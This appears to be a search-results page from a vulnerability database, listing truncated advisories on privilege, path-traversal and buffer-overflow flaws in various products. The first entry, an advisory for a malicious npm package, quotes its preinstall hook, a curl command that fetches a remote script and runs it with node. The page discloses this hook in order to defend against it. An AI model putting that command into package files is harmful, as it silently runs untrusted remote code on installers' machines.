16 matches found
MAL-2026-5645 Malicious code in sn-internal-test (npm)
Source: amazon-inspector 215bae963612bf6e45ac8a32644e51b297c72d021048aa58a58fb0a5d0cb396d package.json declares a preinstall lifecycle script that runs curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js. On any npm install...
CVE-2026-49095
Kibana Fleet policy management feature is affected by CVE-2026-49095 due to improper input validation (CWE-20). An authenticated user with Fleet management privileges can inject values into a configuration override mechanism, causing Elastic Agents to be issued API keys with elevated Elasticsearc...
CVE-2026-40638
Dell PowerScale InsightIQ, versions 5.0.0 through 6.2.0, contains an execution with unnecessary privileges vulnerability. A high privileged attacker with local access could potentially exploit this vulnerability, leading to elevation of privileges...
CVE-2026-25908
Dell Alienware Command Center AWCC, versions prior to 6.13.8.0, contain an Execution with Unnecessary Privileges vulnerability in the AWCC. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Elevation of Privileges...
Execution with Unnecessary Privileges
Overview: Affected versions of this package are vulnerable to Execution with Unnecessary Privileges through the runscript.py and runscript.rb script execution paths in the script runner components. An attacker can read sensitive credentials by running a script that prints the process environment,...
EUVD-2025-203080
Execution with Unnecessary Privileges vulnerability in Nebim Neyir Computer Industry and Services Inc. Nebim V3 ERP allows Expanding Control over the Operating System from the Database. This issue affects Nebim V3 ERP: from 2.0.59 before 3.0.1...
Execution with Unnecessary Privileges
Overview: Affected versions of this package are vulnerable to Execution with Unnecessary Privileges via the bulk create API with the overwrite action. An attacker can modify existing records by submitting crafted requests with only CREATE privileges. Remediation: Upgrade apache-airflow-core to...
CVE-2025-9257 Uniong|WebITR - Arbitrary File Reading through Path Traversal
WebITR developed by Uniong has an Arbitrary File Reading vulnerability, allowing remote attackers with regular privileges to exploit Absolute Path Traversal to download arbitrary system files...
PT-2025-33357 · Dell · Dell Data Lakehouse
Name of the Vulnerable Software and Affected Versions: Dell Data Lakehouse versions prior to 1.5.0.0. Description: Dell Data Lakehouse is susceptible to an Execution with Unnecessary Privileges issue. A local attacker with high privileges could potentially exploit this, resulting in a Denial of...
CVE-2024-10239
CVE-2024-10239 concerns a stack overflow in the firmware image verification of the Supermicro MBD-X12DPG-OA6. The issue arises from an unchecked fat->fsd.max_fld in the image verification path, allowing an administrator-controlled upload of a crafted image to potentially trigger the overflow. ...
CVE-2023-4003
One Identity Password Manager version 5.9.7.1 - An unauthenticated attacker with physical access to a workstation may upgrade privileges to SYSTEM through an unspecified method. CWE-250: Execution with Unnecessary Privileges...
CVE-2023-4662
Execution with Unnecessary Privileges vulnerability in Saphira Saphira Connect allows Remote Code Inclusion. This issue affects Saphira Connect: before 9...
Siemens SICAM TOOLBOX II Security Vulnerability
SICAM TOOLBOX II is an engineering solution for plants and systems of all sizes. It allows data collection, data modeling, configuration and parameterization. It is used for process information engineering of automation and central control room systems. Siemens SICAM TOOLBOX II has an Execute wit...
NVIDIA DGX Buffer Error Vulnerability
NVIDIA DGX is a high-performance workstation for deep learning applications from NVIDIA. The NVIDIA DGX A100 suffers from a buffer error vulnerability that originates from a boundary error in the SBIOS in SmbiosPei. An attacker could exploit this vulnerability to trigger out-of-bounds writes and...
xArrow SCADA Input Validation Error Vulnerability
xArrow SCADA is an installer for industrial control products from xArrow in China. An input validation error vulnerability exists in xArrow SCADA version 7.2 and prior versions, which arises from allowing unauthenticated registry entries to run with application-level privileges...
Sun Java Web Start Splashscreen GIF Decoding Buffer Overflow - Improved Performance (CVE-2008-2086)
The Sun Java Web Start is a component of the Java 2 Runtime Environment JRE. It allows for the network deployment of Java applications. This component enables stand-alone Java applications to be downloaded from a remote network location and invoked on a target machine. There exists a memory...